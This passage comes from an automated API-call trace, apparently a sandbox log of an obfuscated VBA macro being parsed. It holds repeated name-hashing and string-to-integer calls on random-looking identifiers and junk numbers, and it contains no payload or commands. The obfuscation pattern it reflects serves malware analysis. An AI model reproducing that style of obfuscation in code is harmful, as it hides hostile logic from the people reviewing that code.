plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="24942998", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="622054087", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="702274180", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="550130317", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="358671887", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="25283992", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="13570907", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.940] VarI4FromStr (in: strIn="211210907", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i4AAwQA4") returned 0x10e1ac [0067.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.941] VarI4FromStr (in: strIn="766943003", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ABUUwBAc") returned 0x102537 [0067.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAUQA") returned 0x107926 [0067.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAUUX") returned 0x10fba8 [0067.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.942] VarI4FromStr (in: strIn="248141431", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] VarI4FromStr (in: strIn="84890557", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] VarI4FromStr (in: strIn="241963879", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] VarI4FromStr (in: strIn="899740288", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] VarI4FromStr (in: strIn="190808351", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LA1A4cD") returned 0x10d5b7 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAQAAQ") returned 0x106061 [0067.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.942] VarI4FromStr (in: strIn="815011416", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] VarI4FromStr (in: strIn="527922682", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="h_QQU4") returned 0x10c1c6 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.942] VarI4FromStr (in: strIn="866469279", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] VarI4FromStr (in: strIn="524624946", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.942] VarI4FromStr (in: strIn="151572779", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] VarI4FromStr (in: strIn="125801648", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.942] VarI4FromStr (in: strIn="311236678", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lAAxAQXA") returned 0x10f163 [0067.942] VarI4FromStr (in: strIn="584657026", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BUoAA_AU") returned 0x103f7e [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bD4QAoAU") returned 0x107f77 [0067.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zA_ADA") returned 0x10b865 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bACkAAAA") returned 0x1065ed [0067.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.943] VarI4FromStr (in: strIn="919557271", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i1ABABB") returned 0x10dcb9 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YDkoGA4") returned 0x1055f3 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HAAAAkBC") returned 0x10af89 [0067.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.943] VarI4FromStr (in: strIn="415114370", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] VarI4FromStr (in: strIn="45212820", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] VarI4FromStr (in: strIn="889165453", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] VarI4FromStr (in: strIn="723742193", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] VarI4FromStr (in: strIn="742187015", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="H_cx4AB") returned 0x1083e0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UDAAAA") returned 0x10d213 [0067.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.943] VarI4FromStr (in: strIn="508895324", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] VarI4FromStr (in: strIn="120914507", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nDAAwAx") returned 0x106d31 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.943] VarI4FromStr (in: strIn="82056222", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] VarI4FromStr (in: strIn="439641606", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.943] VarI4FromStr (in: strIn="791646905", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] VarI4FromStr (in: strIn="212349206", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.943] VarI4FromStr (in: strIn="860595679", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAXBBA") returned 0x10d40c [0067.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.944] VarI4FromStr (in: strIn="286172905", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAUGAAcQ") returned 0x10ac35 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ak4BAD") returned 0x100512 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAQAACD") returned 0x1069aa [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QQ_QAAx") returned 0x104f88 [0067.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.944] VarI4FromStr (in: strIn="602261484", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CAXkkA") returned 0x107d36 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iQBAAA") returned 0x10f058 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CAAUAkB4") returned 0x1021c3 [0067.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.944] VarI4FromStr (in: strIn="950465990", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] VarI4FromStr (in: strIn="868528405", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] VarI4FromStr (in: strIn="937285484", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] VarI4FromStr (in: strIn="544362442", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] VarI4FromStr (in: strIn="838109012", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lkk1AoU") returned 0x1076ab [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kQUZ4A") returned 0x104d0b [0067.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.944] VarI4FromStr (in: strIn="795902191", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] VarI4FromStr (in: strIn="815519731", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PBAAAAc") returned 0x104f04 [0067.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.945] VarI4FromStr (in: strIn="587471369", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.945] VarI4FromStr (in: strIn="178756856", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.945] VarI4FromStr (in: strIn="237813060", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.945] VarI4FromStr (in: strIn="687847702", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.945] VarI4FromStr (in: strIn="653605567", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.945] IMalloc:Realloc (This=0x7fefec05380, pv=0xafd3b10, cb=0x4800) returned 0xafc2db0 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="w4A4AwoD") returned 0x105765 [0067.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.945] VarI4FromStr (in: strIn="485397388", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dADxADkA") returned 0x10f860 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="C_1BxA_") returned 0x10ce2b [0067.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc054a, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0067.945] IMalloc:Realloc (This=0x7fefec05380, pv=0x64fcbb0, cb=0x400) returned 0xafa6fa0 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HUCAAAAA") returned 0x108361 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uDcUQAA") returned 0x109e40 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.945] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="R4CZA4") returned 0x108038 [0067.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.946] VarI4FromStr (in: strIn="600064472", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VUC_UQ") returned 0x10c7ce [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qAkAAZA") returned 0x102701 [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zA_AAUAQ") returned 0x107a51 [0067.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.946] VarI4FromStr (in: strIn="465458234", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] VarI4FromStr (in: strIn="326510718", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] VarI4FromStr (in: strIn="203819053", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] VarI4FromStr (in: strIn="202577778", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] VarI4FromStr (in: strIn="313753938", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAwwAACw") returned 0x104d84 [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pCAAAD") returned 0x10ceba [0067.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.946] VarI4FromStr (in: strIn="612619522", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] VarI4FromStr (in: strIn="264141917", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bwCGxwU") returned 0x10ebbc [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.946] VarI4FromStr (in: strIn="946355957", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] VarI4FromStr (in: strIn="451652561", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.946] VarI4FromStr (in: strIn="514596812", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.946] VarI4FromStr (in: strIn="298790080", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.947] VarI4FromStr (in: strIn="511414461", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lx1DAU") returned 0x10213f [0067.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.947] VarI4FromStr (in: strIn="22996945", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GCQBD1w") returned 0x1021a9 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZoAXZ") returned 0x10015f [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zBxUxw") returned 0x105050 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="h4ZcDAQB") returned 0x10029e [0067.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.947] VarI4FromStr (in: strIn="505003114", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uC_ZDUA") returned 0x1016ba [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PDx14w") returned 0x10cbd5 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pAUXoUG") returned 0x10aed0 [0067.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.947] VarI4FromStr (in: strIn="328492329", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] VarI4FromStr (in: strIn="695839498", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] VarI4FromStr (in: strIn="255269525", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] VarI4FromStr (in: strIn="968993980", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] VarI4FromStr (in: strIn="716864526", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LoAXAQ") returned 0x10c5d1 [0067.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AGQBQ14w") returned 0x10f463 [0067.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.948] VarI4FromStr (in: strIn="384987483", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] VarI4FromStr (in: strIn="114730281", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BAADcAA") returned 0x1026ee [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.948] VarI4FromStr (in: strIn="165696728", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] VarI4FromStr (in: strIn="391479531", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.948] VarI4FromStr (in: strIn="144169731", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] VarI4FromStr (in: strIn="355437707", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.948] VarI4FromStr (in: strIn="730391491", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GkDAA_") returned 0x10e2f4 [0067.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.948] VarI4FromStr (in: strIn="12244824", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kUAADU") returned 0x10a020 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vABooUQ") returned 0x105670 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAA4B") returned 0x108bd9 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAUAADZ") returned 0x10b19b [0067.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.949] VarI4FromStr (in: strIn="569738650", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="r4AwXwAD") returned 0x107639 [0067.949] LHashValOfNameSysA (syskind=0x3, 